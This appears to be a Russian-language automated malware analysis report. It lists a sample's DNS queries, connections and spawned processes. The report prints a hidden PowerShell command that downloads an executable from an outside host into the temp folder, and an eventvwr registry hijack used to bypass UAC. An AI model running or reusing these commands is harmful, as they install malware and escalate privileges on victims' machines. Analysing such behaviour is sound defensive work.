Техническая информация
- https://d.filebox.moe/flmic.exe как %temp%\\flmic.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://d.filebox.moe/flmic.exe','%TEMP%\\flmic.exe') & reg add HKCU\\Software\\Classes\\mscfile\\she...
- nul
- 'd.###ebox.moe':443
- 'x2.#.lencr.org':80
- 'x1.#.lencr.org':80
- http://x2.#.lencr.org/
- http://x1.#.lencr.org/
- 'd.###ebox.moe':443
- DNS ASK d.###ebox.moe
- DNS ASK x2.#.lencr.org
- DNS ASK x1.#.lencr.org
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://d.filebox.moe/flmic.exe','%TEMP%\\flmic.exe') & reg add HKCU\\Software\\Classes\\mscfile\\she...' (со скрытым окном)
- '<SYSTEM32>\mmc.exe' "<SYSTEM32>\eventvwr.msc"' (со скрытым окном)
- '<SYSTEM32>\reg.exe' add HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /d %TEMP%\\flmic.exe /f
- '<SYSTEM32>\eventvwr.exe'
- '<SYSTEM32>\mmc.exe' "<SYSTEM32>\eventvwr.msc"
- '<SYSTEM32>\ping.exe' -n 15 127.0.0.1